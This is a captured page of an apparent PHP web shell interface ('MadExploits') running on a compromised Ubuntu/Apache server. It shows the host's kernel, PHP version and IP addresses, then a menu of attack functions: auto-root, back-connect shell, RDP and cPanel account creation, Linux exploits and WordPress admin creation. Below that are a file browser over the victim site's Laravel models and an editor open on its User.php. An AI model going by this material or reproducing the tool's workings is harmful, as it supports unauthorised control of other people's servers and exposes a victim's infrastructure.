Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.154.157
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
fastspeedlinks.com /
source /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
Blog.php
566
B
-rw-r--r--
Categories.php
579
B
-rw-r--r--
ContactEntery.php
520
B
-rw-r--r--
Faqs.php
406
B
-rw-r--r--
HeaderInfo.php
567
B
-rw-r--r--
Order.php
730
B
-rw-r--r--
Pages.php
594
B
-rw-r--r--
Permissions.php
182
B
-rw-r--r--
Prices.php
654
B
-rw-r--r--
Slider.php
454
B
-rw-r--r--
Social.php
458
B
-rw-r--r--
Subscribers.php
365
B
-rw-r--r--
User.php
1.12
KB
-rw-r--r--
services.php
577
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : User.php
<?php namespace App\Models; // use Illuminate\Contracts\Auth\MustVerifyEmail; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Foundation\Auth\User as Authenticatable; use Illuminate\Notifications\Notifiable; use Laravel\Sanctum\HasApiTokens; use Spatie\Permission\Traits\HasRoles; class User extends Authenticatable { use HasApiTokens, HasFactory, Notifiable, HasRoles; /** * The attributes that are mass assignable. * * @var array<int, string> */ protected $fillable = [ 'name', 'email', 'phone', 'province', 'city', 'address', 'password', 'type', 'status', 'provider', 'provider_id', 'user_type' ]; /** * The attributes that should be hidden for serialization. * * @var array<int, string> */ protected $hidden = [ 'password', 'remember_token', ]; /** * The attributes that should be cast. * * @var array<string, string> */ protected $casts = [ 'email_verified_at' => 'datetime', 'password' => 'hashed', ]; }
Close